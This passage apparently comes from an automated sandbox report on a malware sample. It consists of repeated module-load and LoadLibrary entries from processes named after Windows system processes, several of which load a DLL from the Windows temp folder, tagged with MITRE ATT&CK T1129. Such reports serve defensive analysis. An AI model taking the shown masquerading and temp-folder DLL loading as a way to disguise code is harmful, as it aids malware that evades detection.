module \"OLEAUT32.DLL\" at base 76900000\n \"D3_08.exe\" loaded module \"SXS.DLL\" at base 74e30000\n \"D3_08.exe\" loaded module \"CRYPTSP.DLL\" at base 74930000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 746c0000\n \"D3_08.exe\" loaded module \"ADVAPI32.DLL\" at base 771c0000\n \"D3_08.exe\" loaded module \"CRYPTBASE.DLL\" at base 74e20000\n \"D3_08.exe\" loaded module \"DWMAPI.DLL\" at base 73840000\n \"D3_08.exe\" loaded module \"KERNEL32.DLL\" at base 76e50000\n \"D3_08.exe\" loaded module \"SHELL32.DLL\" at base 75260000\n \"D3_08.exe\" loaded module \"OLE32.DLL\" at base 76030000\n \"D3_08.exe\" loaded module \"COMCTL32.DLL\" at base 73e20000\n \"D3_08.exe\" loaded module \"CLBCATQ.DLL\" at base 76b20000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ab0000\n \"D3_08.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76e50000\n \"D3_08.exe\" loaded module \"SETUPAPI.DLL\" at base 762e0000\n \"D3_08.exe\" loaded module \"RPCRT4.DLL\" at base 75f80000\n \"D3_08.exe\" loaded module \"NTMARTA.DLL\" at base 74390000\n \"D3_08.exe\" loaded module \"USER32\" at base 75eb0000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74dd0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73bf0000\n \"IExplorer.exe\" loaded module \"OLEAUT32.DLL\" at base 76900000\n \"IExplorer.exe\" loaded module \"SXS.DLL\" at base 74e30000\n \"IExplorer.exe\" loaded module \"CRYPTSP.DLL\" at base 74930000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 746c0000\n \"IExplorer.exe\" loaded module \"ADVAPI32.DLL\" at base 771c0000\n \"IExplorer.exe\" loaded module \"CRYPTBASE.DLL\" at base 74e20000\n \"IExplorer.exe\" loaded module \"DWMAPI.DLL\" at base 73840000\n \"IExplorer.exe\" loaded module \"KERNEL32.DLL\" at base 76e50000\n \"IExplorer.exe\" loaded module \"KERNEL32\" at base 76e50000\n \"IExplorer.exe\" loaded module \"SHELL32.DLL\" at base 75260000\n \"IExplorer.exe\" loaded module \"OLE32.DLL\" at base 76030000\n \"IExplorer.exe\" loaded module \"COMCTL32.DLL\" at base 73e20000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76e50000\n \"IExplorer.exe\" loaded module \"SETUPAPI.DLL\" at base 762e0000\n \"IExplorer.exe\" loaded module \"RPCRT4.DLL\" at base 75f80000\n \"IExplorer.exe\" loaded module \"CLBCATQ.DLL\" at base 76b20000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ab0000\n \"IExplorer.exe\" loaded module \"NTMARTA.DLL\" at base 74390000\n \"IExplorer.exe\" loaded module \"USER32\" at base 75eb0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74dd0000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70500000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"KERNEL32\" at base 76e50000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c920000\n \"WINLOGON.EXE\" loaded module \"OLEAUT32.DLL\" at base 76900000\n \"WINLOGON.EXE\" loaded module \"SXS.DLL\" at base 74e30000\n \"WINLOGON.EXE\" loaded module \"CRYPTSP.DLL\" at base 74930000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 746c0000\n \"WINLOGON.EXE\" loaded module \"ADVAPI32.DLL\" at base 771c0000\n \"WINLOGON.EXE\" loaded module \"CRYPTBASE.DLL\" at base 74e20000\n \"WINLOGON.EXE\" loaded module \"KERNEL32.DLL\" at base 76e50000\n \"WINLOGON.EXE\" loaded module \"SHELL32.DLL\" at base 75260000\n \"WINLOGON.EXE\" loaded module \"OLE32.DLL\" at base 76030000\n \"WINLOGON.EXE\" loaded module \"COMCTL32.DLL\" at base 73e20000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76e50000\n \"WINLOGON.EXE\" loaded module \"SETUPAPI.DLL\" at base 762e0000\n \"WINLOGON.EXE\" loaded module \"RPCRT4.DLL\" at base 75f80000\n \"WINLOGON.EXE\" loaded module \"CLBCATQ.DLL\" at base 76b20000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ab0000\n \"WINLOGON.EXE\" loaded module \"NTMARTA.DLL\" at base 74390000\n \"WINLOGON.EXE\" loaded module \"USER32\" at base 75eb0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74dd0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73bf0000\n \"CSRSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76900000\n \"CSRSS.EXE\" loaded module \"SXS.DLL\" at base 74e30000\n \"CSRSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 74930000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 746c0000\n \"CSRSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 771c0000\n \"CSRSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 74e20000\n \"CSRSS.EXE\" loaded module \"DWMAPI.DLL\" at base 73840000\n \"CSRSS.EXE\" loaded module \"KERNEL32.DLL\" at base 76e50000\n \"CSRSS.EXE\" loaded module \"SHELL32.DLL\" at base 75260000\n \"CSRSS.EXE\" loaded module \"OLE32.DLL\" at base 76030000\n \"CSRSS.EXE\" loaded module \"COMCTL32.DLL\" at base 73e20000\n \"CSRSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 76b20000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ab0000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76e50000\n \"CSRSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 762e0000\n \"CSRSS.EXE\" loaded module \"RPCRT4.DLL\" at base 75f80000\n \"CSRSS.EXE\" loaded module \"NTMARTA.DLL\" at base 74390000\n \"CSRSS.EXE\" loaded module \"USER32\" at base 75eb0000\n \"CSRSS.EXE\" loaded module \"KERNEL32\" at base 76e50000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74dd0000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70500000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c920000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70500000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"IExplorer.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c920000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70500000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SERVICES.EXE\" loaded module \"KERNEL32\" at base 76e50000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c920000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73bf0000\n \"SERVICES.EXE\" loaded module \"OLEAUT32.DLL\" at base 76900000\n \"SERVICES.EXE\" loaded module \"SXS.DLL\" at base 74e30000\n \"SERVICES.EXE\" loaded module \"CRYPTSP.DLL\" at base 74930000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 746c0000\n \"SERVICES.EXE\" loaded module \"ADVAPI32.DLL\" at base 771c0000\n \"SERVICES.EXE\" loaded module \"CRYPTBASE.DLL\" at base 74e20000\n \"SERVICES.EXE\" loaded module \"KERNEL32.DLL\" at base 76e50000\n \"SERVICES.EXE\" loaded module \"SHELL32.DLL\" at base 75260000\n \"SERVICES.EXE\" loaded module \"OLE32.DLL\" at base 76030000\n \"SERVICES.EXE\" loaded module \"COMCTL32.DLL\" at base 73e20000\n \"SERVICES.EXE\" loaded module \"CLBCATQ.DLL\" at base 76b20000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ab0000\n \"SERVICES.EXE\" loaded module \"NTMARTA.DLL\" at base 74390000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76e50000\n \"SERVICES.EXE\" loaded module \"SETUPAPI.DLL\" at base 762e0000\n \"SERVICES.EXE\" loaded module \"RPCRT4.DLL\" at base 75f80000\n \"SERVICES.EXE\" loaded module \"USER32\" at base 75eb0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74dd0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73bf0000\n \"LSASS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76900000\n \"LSASS.EXE\" loaded module \"SXS.DLL\" at base 74e30000\n \"LSASS.EXE\" loaded module \"CRYPTSP.DLL\" at base 74930000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 746c0000\n \"LSASS.EXE\" loaded module \"ADVAPI32.DLL\" at base 771c0000\n \"LSASS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 74e20000\n \"LSASS.EXE\" loaded module \"KERNEL32.DLL\" at base 76e50000\n \"LSASS.EXE\" loaded module \"SHELL32.DLL\" at base 75260000\n \"LSASS.EXE\" loaded module \"OLE32.DLL\" at base 76030000\n \"LSASS.EXE\" loaded module \"COMCTL32.DLL\" at base 73e20000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76e50000\n \"LSASS.EXE\" loaded module \"SETUPAPI.DLL\" at base 762e0000\n \"LSASS.EXE\" loaded module \"RPCRT4.DLL\" at base 75f80000\n \"LSASS.EXE\" loaded module \"CLBCATQ.DLL\" at base 76b20000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ab0000\n \"LSASS.EXE\" loaded module \"NTMARTA.DLL\" at base 74390000\n \"LSASS.EXE\" loaded module \"USER32\" at base 75eb0000\n \"LSASS.EXE\" loaded module \"KERNEL32\" at base 76e50000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74dd0000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70500000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SMSS.EXE\" loaded module \"KERNEL32\" at base 76e50000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73bf0000\n \"SMSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76900000\n \"SMSS.EXE\" loaded module \"SXS.DLL\" at base 74e30000\n \"SMSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 74930000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 746c0000\n \"SMSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 771c0000\n \"SMSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 74e20000\n \"SMSS.EXE\" loaded module \"DWMAPI.DLL\" at base 73840000\n \"SMSS.EXE\" loaded module \"KERNEL32.DLL\" at base 76e50000\n \"SMSS.EXE\" loaded module \"SHELL32.DLL\" at base 75260000\n \"SMSS.EXE\" loaded module \"OLE32.DLL\" at base 76030000\n \"SMSS.EXE\" loaded module \"COMCTL32.DLL\" at base 73e20000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76e50000\n \"SMSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 762e0000\n \"SMSS.EXE\" loaded module \"RPCRT4.DLL\" at base 75f80000\n \"SMSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 76b20000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ab0000\n \"SMSS.EXE\" loaded module \"NTMARTA.DLL\" at base 74390000\n \"SMSS.EXE\" loaded module \"USER32\" at base 75eb0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74dd0000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70500000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73bf0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c920000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003404)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002520)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002520)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002520)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002520)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002520)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002520)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002520)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002520)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002520)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002520)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002520)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00002520)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00002520)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002520)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00002520)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00002520)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00002520)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00002520)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002520)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00002520)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002088)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002088)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002088)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002088)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002088)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002088)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002088)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002088)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00002088)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00002088)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002088)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00002088)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00002088)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00002088)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00002088)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002088)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00002088)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002736)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002736)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002736)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002736)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002736)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002736)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002736)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002736)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002736)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002736)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003320)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003320)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003320)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003320)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003320)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003320)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003320)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003320)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005040)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005040)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005040)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005040)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005040)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005040)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005040)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005040)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005040)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005040)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005040)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005040)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005040)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005040)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005040)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005040)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005040)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005040)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005084)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005084)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005084)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005084)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005084)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005084)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004612)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004612)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004612)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004612)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004612)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004612)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004612)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004612)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004612)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004612)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004612)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004612)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004612)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004612)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004612)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00004612)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004612)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003580)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003580)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003580)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003580)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003580)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003580)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002756)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002756)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002756)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002756)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002756)\n \"CSRSS.EXE\" called 